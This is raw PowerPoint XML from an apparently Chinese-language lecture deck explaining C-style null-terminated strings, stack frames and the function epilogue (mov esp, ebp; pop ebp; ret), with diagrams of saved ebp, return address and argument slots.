            <a:ext cx="251460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Stack frame main</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58405" name="AutoShape 37"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="58399" idx="3"/>
            <a:endCxn id="58404" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3613150" y="2894013"/>
            <a:ext cx="1588" cy="579437"/>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58406" name="AutoShape 38"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="58402" idx="3"/>
            <a:endCxn id="58401" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="746125" y="2590800"/>
            <a:ext cx="3524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58407" name="AutoShape 39"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="58403" idx="3"/>
            <a:endCxn id="58399" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="746125" y="2894013"/>
            <a:ext cx="352425" cy="1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58408" name="AutoShape 40"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="58379" idx="3"/>
            <a:endCxn id="58380" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5286375"/>
            <a:ext cx="1588" cy="304800"/>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58409" name="Text Box 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="1828800"/>
            <a:ext cx="989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a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Before</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58410" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="1828800"/>
            <a:ext cx="7762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a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>After</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58411" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="4953000"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov esp, ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58412" name="AutoShape 44"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="58373" idx="1"/>
            <a:endCxn id="58411" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3581400" y="3473450"/>
            <a:ext cx="1447800" cy="1974850"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58413" name="AutoShape 45"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="58378" idx="1"/>
            <a:endCxn id="58411" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3581400" y="4981575"/>
            <a:ext cx="1447800" cy="466725"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{995E8DC3-6773-B14F-B697-ECFEC989770F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210408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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>风格的字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756320" y="1982514"/>
            <a:ext cx="8229600" cy="4326806"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>在软件工程中，字符串是一个基本的概念，但它并不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>的内建类型。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>风格的字符串由一个连续的字符序列组成，并以一个空字符（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>）作为结束。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>一个指向字符串的指针实际上就是指向该字符串的起始字符。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串长度指空字符之前的字符个数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串的值则是它所包含的按顺序排列的字符序列。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>存储一个字符串所需要的字节数是字符串的字节数加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>单位是每个字符的大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8196" name="Group 28"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2627784" y="2708920"/>
            <a:ext cx="3886200" cy="1162050"/>
            <a:chOff x="1008" y="1728"/>
            <a:chExt cx="2448" cy="732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8197" name="Group 25"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1008" y="1728"/>
              <a:ext cx="2448" cy="336"/>
              <a:chOff x="1392" y="240"/>
              <a:chExt cx="2448" cy="336"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8200" name="Rectangle 5"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1824" y="240"/>
                <a:ext cx="336" cy="336"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="CCECFF"/>
              </a:solidFill>
              <a:ln w="28575">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd type="none" w="sm" len="sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                    <a:latin typeface="Courier New" charset="0"/>
                    <a:cs typeface="宋体" charset="0"/>
                  </a:rPr>
                  <a:t>h</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8201" name="Line 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1392" y="408"/>
                <a:ext cx="432"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02" name="Rectangle 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2160" y="240"/>
                <a:ext cx="336" cy="336"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="CCECFF"/>
              </a:solidFill>
              <a:ln w="28575">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd type="none" w="sm" len="sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                    <a:latin typeface="Courier New" charset="0"/>
                    <a:cs typeface="宋体" charset="0"/>
                  </a:rPr>
                  <a:t>e</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8203" name="Rectangle 21"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2496" y="240"/>
                <a:ext cx="336" cy="336"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="CCECFF"/>
              </a:solidFill>
              <a:ln w="28575">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd type="none" w="sm" len="sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                    <a:latin typeface="Courier New" charset="0"/>
                    <a:cs typeface="宋体" charset="0"/>
                  </a:rPr>
                  <a:t>l</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8204" name="Rectangle 22"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2832" y="240"/>
                <a:ext cx="336" cy="336"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="CCECFF"/>
              </a:solidFill>
              <a:ln w="28575">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd type="none" w="sm" len="sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                    <a:latin typeface="Courier New" charset="0"/>
                    <a:cs typeface="宋体" charset="0"/>
                  </a:rPr>
                  <a:t>l</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8205" name="Rectangle 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3168" y="240"/>
                <a:ext cx="336" cy="336"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="CCECFF"/>
              </a:solidFill>
              <a:ln w="28575">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd type="none" w="sm" len="sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                    <a:latin typeface="Courier New" charset="0"/>
                    <a:cs typeface="宋体" charset="0"/>
                  </a:rPr>
                  <a:t>o</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8206" name="Rectangle 24"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3504" y="240"/>
                <a:ext cx="336" cy="336"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="CCECFF"/>
              </a:solidFill>
              <a:ln w="28575">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd type="none" w="sm" len="sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                    <a:latin typeface="Courier New" charset="0"/>
                    <a:cs typeface="宋体" charset="0"/>
                  </a:rPr>
                  <a:t>\0</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8198" name="AutoShape 26"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-5400000">
              <a:off x="2232" y="1320"/>
              <a:ext cx="96" cy="1680"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 145833"/>
                <a:gd name="adj2" fmla="val 50000"/>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cs typeface="宋体" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8199" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2045" y="2208"/>
              <a:ext cx="441"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zh-CN" altLang="en-US">
                  <a:cs typeface="宋体" charset="0"/>
                </a:rPr>
                <a:t>长度</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{995E8DC3-6773-B14F-B697-ECFEC989770F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38532796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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>get_buff()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="29400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ebp (frame 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59396" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="32448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address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59397" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="35496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59398" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="38385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argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59399" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="41433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f() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59400" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="44481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ebp (frame 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
